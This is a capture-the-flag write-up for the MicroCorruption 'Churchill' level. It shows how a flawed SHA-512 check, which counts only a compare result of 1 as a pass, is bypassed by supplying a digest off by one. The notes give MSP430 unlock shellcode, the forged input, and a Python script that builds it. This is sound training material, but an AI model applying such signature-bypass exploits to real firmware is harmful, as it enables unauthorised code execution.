MicroCorruption/22-Churchill/notes.md
2022-12-11 21:03:53 -06:00

Churchill seems not to verify after 0xff bytes?

Sample input

8000 00 06 3041 c26436953f8f3cadf1442fc218b185051ab6c20853a45f093fc32adf31529d05a5ec3e96a9e41ed9ad1b14dcbdb98e50e37a7ddc3d595b867807ed1605f2070e

Layout:

| Loadaddr | Signature type | Length | Payload | Signature |
|---|---|---|---|---|
| 8000 | 00 (ed25519) | 06 | 3041 (ret) | c26436... |
| 8000 | 01 (sha512) | 12 (decimal, i.e. 0c hex) | 324000ff b0121000 | f009805ec519029923b72a6e63589a081295759bbf7e12090be7b784f622a24e135d2603b861cc0398b366b1a5d8a89836544a164c39f4e68361413ab6f049a5 |

The length byte counts the 4 header bytes (loadaddr, type, length) plus the payload: 06 for the 2-byte ret, 0c for the 8-byte shellcode.

Shellcode disassembly (MSP430, immediates little-endian):

324000ff mov  #ff00, sr
b0121000 call #0010

This is the usual Microcorruption unlock: sr = 0x8000 | (0x7f << 8) = 0xff00, so call #0010 fires INT 0x7f.

Payload

8000 01 0c 3240 00ff b012 1000

Hash (sha512): 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec

complete payload: 8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec

THE TWIST

The program explicitly checks for 0x1 when evaluating the result of the hash comparison. For perfectly identical strings this DOESN'T WORK, because memcmp returns 0 on equality.

Solution: subtract 1 from the last byte of the supplied hash. It will be off by one, so when the program compares it against the hash it computed, r15 ends up holding 0x0001, which is exactly what the check wants.

Final Answer (last byte of the hash changed from ec to eb):

8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40eb
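
The payload construction and the off-by-one twist above, carried through end to end as an added Python example. This is not code from the notes or from the challenge firmware. It assumes the record layout from the table (loadaddr 2 bytes, type 1, length 1 counting header plus payload, then the payload), that the sha512 field is SHA-512 over the 12-byte record, and that the firmware's compare routine behaves like a sign-returning memcmp (0 on equality, 1 when the computed digest is greater at the first differing byte) whose result is accepted only when it equals 1. `firmware_compare` and `firmware_accepts` are that assumed model, not the challenge's own routines. It also covers a case the notes do not hit: a digest whose last byte is 0x00, which cannot be decremented without a borrow.

```python
"""Build a Churchill sha512-type record and apply the off-by-one twist.

Added example; not the challenge's code. Assumed (see lead-in):
  record  = loadaddr(2) | sigtype(1) | length(1) | payload
  length  = 4 header bytes + len(payload)
  digest  = SHA-512(record), appended after the payload
  check   = compare(computed, supplied) == 1, where compare is the
            sign of the first differing byte (0 if equal).
"""
import hashlib

SIG_ED25519 = 0x00
SIG_SHA512 = 0x01

# Unlock shellcode from the notes (MSP430, little-endian immediates):
#   3240 00ff   mov  #0xff00, sr   ; 0x8000 | (0x7f << 8) -> INT 0x7f
#   b012 1000   call #0x10
SHELLCODE = bytes.fromhex("324000ffb0121000")


def build_record(loadaddr: bytes, sigtype: int, payload: bytes) -> bytes:
    """Header plus payload; the length byte counts both (0x0c here)."""
    if len(loadaddr) != 2:
        raise ValueError("loadaddr field is two bytes")
    length = 2 + 1 + 1 + len(payload)
    if length > 0xFF:
        raise ValueError("length does not fit in one byte")
    return loadaddr + bytes([sigtype, length]) + payload


def record_digest(record: bytes) -> bytes:
    """Assumed: the sha512-type signature is SHA-512 over the record."""
    return hashlib.sha512(record).digest()


def firmware_compare(computed: bytes, supplied: bytes) -> int:
    """Model of the flawed check: sign of the first differing byte.

    Both inputs are 64-byte digests; equal inputs give 0.
    """
    for a, b in zip(computed, supplied):
        if a != b:
            return 1 if a > b else -1
    return 0


def firmware_accepts(record: bytes, supplied_digest: bytes) -> bool:
    """The twist: only compare() == 1 counts as 'verified'."""
    return firmware_compare(record_digest(record), supplied_digest) == 1


def off_by_one_digest(digest: bytes) -> bytes:
    """Decrement the last nonzero byte so computed > supplied at the
    first differing byte.

    Decrementing a 0x00 byte would wrap to 0xff and flip the sign of
    the comparison, so walk back to the last nonzero byte instead.
    """
    d = bytearray(digest)
    i = len(d) - 1
    while i >= 0 and d[i] == 0:
        i -= 1
    if i < 0:
        raise ValueError("all-zero digest")
    d[i] -= 1
    return bytes(d)


def forge_input(loadaddr: bytes = bytes.fromhex("8000"),
                payload: bytes = SHELLCODE) -> bytes:
    """Full input: record followed by the deliberately wrong digest."""
    record = build_record(loadaddr, SIG_SHA512, payload)
    return record + off_by_one_digest(record_digest(record))


if __name__ == "__main__":
    rec = build_record(bytes.fromhex("8000"), SIG_SHA512, SHELLCODE)
    honest = record_digest(rec)
    print("record:               ", rec.hex())
    print("sha512:               ", honest.hex())
    print("exact digest accepted?", firmware_accepts(rec, honest))
    print("off-by-one accepted?  ", firmware_accepts(rec, off_by_one_digest(honest)))
    print("final input:          ", forge_input().hex())
```

Run it and compare the printed final input with the Final Answer above. `off_by_one_digest` walks back past trailing 0x00 bytes because turning 0x00 into 0xff would make the supplied hash larger than the computed one at that position and the modelled compare would return the wrong sign.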